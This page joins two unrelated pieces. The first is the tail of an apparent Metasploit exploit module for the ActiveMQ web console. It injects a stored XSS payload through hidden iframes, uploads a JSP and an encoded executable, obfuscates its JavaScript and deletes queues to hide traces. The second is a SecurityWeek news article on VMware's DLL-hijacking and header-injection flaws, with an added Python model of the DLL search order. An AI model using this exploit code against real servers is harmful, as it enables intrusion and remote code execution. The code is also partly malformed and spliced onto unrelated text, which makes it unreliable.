xhr.open("PUT", uri, true);
var body = file_data;
xhr.send(body);
return true;

function do_upload(uri, file_data) {
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
var body = file_data;

// latest ff doesnt have sendAsBinary(), so we redefine it
if(!xhr.sendAsBinary)
xhr.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;

var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
xhr.sendAsBinary(body);
return true;
}

function bye_bye_xss(uri)
var xhr = new XMLHttpRequest();
xhr.open('GET', uri.replace(/\+/g,"%2b"), true);
xhr.send();

function clean_up()
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var els = xhr.responseXML.getElementsByTagName("a");
for (var i = 0, l = els.length; i < l; i++) {
var el = els[i];
if (el.href.search("http://localhost:8161/admin/deleteDestination.action") == 0) {
bye_bye_xss(el.href);

}
}
}
xhr.open('GET', 'http://localhost:8161/admin/queues.jsp', true);
xhr.responseType = "document"; // so that we can parse the reponse as a document
xhr.send(null);
}

function exploit()
do_upload('#{upload_uri', String.fromCharCode(#encoded_exe[0]) + String.fromCharCode(#encoded_exe[1]));
clean_up();
}

function start()
do_put('#{jsp_uri', String.fromCharCode(#encoded_jsp));
setTimeout(exploit(), 2000); // timing is important
}
start();
|

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
end

print_status("Sending javascript...")
@exploited = true
send_response_html(cli, js_content, 'Content-Type' => 'application/javascript' )
return
end

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
onlick = ::Rex::Exploitation::JSObfu.new(onlick)
onlick.obfuscate
end

iframe_injection = ""
# done so that we can ensure that we hit our payload, since iframes load very fast, we need a few
(1..20).step(1) do |n|
iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
end

# the stored XSS endpoint
target = "http://localhost:8161/admin/browse.jsp?JMSDestination="

# we use XSS to execute JavaScript code in local context to avoid CORS
xss_injection = "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
xss_injection << "a.src='#payload_url';document.body.appendChild(a)\")+\""
target << Rex::Text.uri_encode(xss_injection)

# we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
# and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSS
html_content = %Q|
<html>
<body>
<iframe src="#target" width="0" height="0"></iframe>
#iframe_injection
</body>
</html>
|
print_status("Sending exploit...")
send_response_html(cli, html_content)
handler(cli)
end
end


Exploit Files ≈ Packet Storm

An advisory published by VMware on Thursday describes two important vulnerabilities that affected several of the company’s products.

The first security hole, tracked as CVE-2016-5330, is a DLL hijacking issue in the Windows version of VMware Tools. The flaw can be exploited to execute arbitrary code on the targeted system.

The vulnerability was reported to VMware late last year by Yorick Koster, researcher and co-founder of Dutch security firm Securify. Koster told SecurityWeek that the issue was addressed by the vendor in April, but it was not disclosed until now to give users enough time to patch.

According to Koster, the flaw is related to the VMware Host Guest Client Redirector component of VMware Tools. The component is used for the Shared Folders feature, which allows users to share files between the guest and the host operating system.

The researcher noticed that when a document is opened from a uniform naming convention (UNC) path, the Client Redirector injects a DLL named “vmhgfs.dll” into the application that is used to open the file. Since the DLL was loaded from a relative path, Windows searched for it using the dynamic-link library search order.

This allowed an attacker to place a malicious DLL in a location from where it would likely be loaded before the legitimate file. By getting the Client Redirector to load the malicious DLL into the application, an attacker could have executed arbitrary code with the privileges of the targeted user. An attack could have resulted in the system getting completely compromised.

For the attack to work, the hacker needed to trick the victim into opening any document from the share containing the malicious DLL file. The researcher also believes the attack could have been launched over the Internet if the WebDAV Mini-Redirector was enabled.

Mini-Redirector is a Windows WebDAV client that allows users to access remote shares over the Internet as if they were on the local network. An attacker could have created their own malicious website with WebDAV enabled and used it to host bait documents and the malicious DLL. The vulnerability could have been exploited by luring the victim to the malicious website and getting them to open one of the documents.

Koster said VMware addressed the vulnerability by ensuring that the DLL is loaded from an absolute path. The flaw affects VMware vSphere Hypervisor (ESXi), Workstation Player and Pro, and Fusion.
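
The difference between a load by bare file name and the absolute-path fix described above can be modelled with the documented Windows DLL search order. The following Python model is an added illustration, not code from VMware, Securify or SecurityWeek; the directory layout, the share name and the assumption that the application's current directory is the share holding the opened document are constructed for the example.

```python
# Added illustration (not VMware's or Securify's code): a model of the
# documented Windows DLL search order for a load by bare file name.
# All paths below are constructed; they are not VMware's install layout.
import ntpath

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]


def norm(path):
    """Case-insensitive, separator-normalised form used for comparisons."""
    return ntpath.normpath(path).lower().rstrip("\\")


def search_order(app_dir, cwd, path_dirs, safe_search=True):
    """Directories probed, in order, when a DLL is requested by bare name.

    With SafeDllSearchMode on (the default) the current directory comes
    after the system directories; with it off, right after the application
    directory. KnownDLLs and already-loaded modules are not modelled.
    """
    if safe_search:
        return [app_dir] + SYSTEM_DIRS + [cwd] + list(path_dirs)
    return [app_dir, cwd] + SYSTEM_DIRS + list(path_dirs)


def resolve(request, files, app_dir, cwd, path_dirs, safe_search=True):
    """Return the file that would be loaded for `request`, or None."""
    present = {norm(f) for f in files}
    if ntpath.isabs(request):
        # Fully qualified path: exactly one location is considered.
        return request if norm(request) in present else None
    if ntpath.dirname(request):
        raise ValueError("only bare names and absolute paths are modelled")
    for directory in search_order(app_dir, cwd, path_dirs, safe_search):
        candidate = ntpath.join(directory, request)
        if norm(candidate) in present:
            return candidate
    return None


def audit(request, files, app_dir, cwd, path_dirs, trusted_dirs,
          safe_search=True):
    """Resolve a load and flag it when it lands outside trusted_dirs."""
    loaded = resolve(request, files, app_dir, cwd, path_dirs, safe_search)
    trusted = {norm(d) for d in trusted_dirs}
    untrusted = (loaded is not None
                 and norm(ntpath.dirname(loaded)) not in trusted)
    return {"request": request, "loaded": loaded, "untrusted": untrusted}


# Constructed scenario (assumptions, not taken from the advisory).
APP_DIR = r"C:\Program Files\Viewer"            # application opening the document
VENDOR_DIR = r"C:\Program Files\Vendor\Tools"   # assumed home of the real DLL, on PATH
SHARE = r"\\fileserver\docs"                    # document is opened from this UNC path
FILES = [
    VENDOR_DIR + r"\vmhgfs.dll",   # legitimate copy
    SHARE + r"\report.doc",        # the document the user opens
    SHARE + r"\vmhgfs.dll",        # same-named file sitting next to the document
]
TRUSTED = [APP_DIR, VENDOR_DIR] + SYSTEM_DIRS


def demo():
    """Audit the same DLL requested by bare name and by absolute path."""
    common = dict(files=FILES, app_dir=APP_DIR, cwd=SHARE,
                  path_dirs=[VENDOR_DIR], trusted_dirs=TRUSTED)
    return {
        "bare_name": audit("vmhgfs.dll", **common),
        "absolute": audit(VENDOR_DIR + r"\vmhgfs.dll", **common),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

In this model the bare-name request resolves to the copy on the share because the current directory is probed before the PATH entry that holds the legitimate file, while the absolute request never consults the search order.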

Another vulnerability disclosed on Thursday by VMware is an HTTP header injection issue affecting vCenter Server and ESXi. The flaw, caused by lack of input validation, allows an attacker to set arbitrary HTTP response headers and cookies, and launch cross-site scripting (XSS) or malicious redirect attacks.

The security hole, tracked as CVE-2016-5331, was reported to VMware independently by several researchers.


Previous Columns by Eduard Kovacs:



SecurityWeek RSS Feed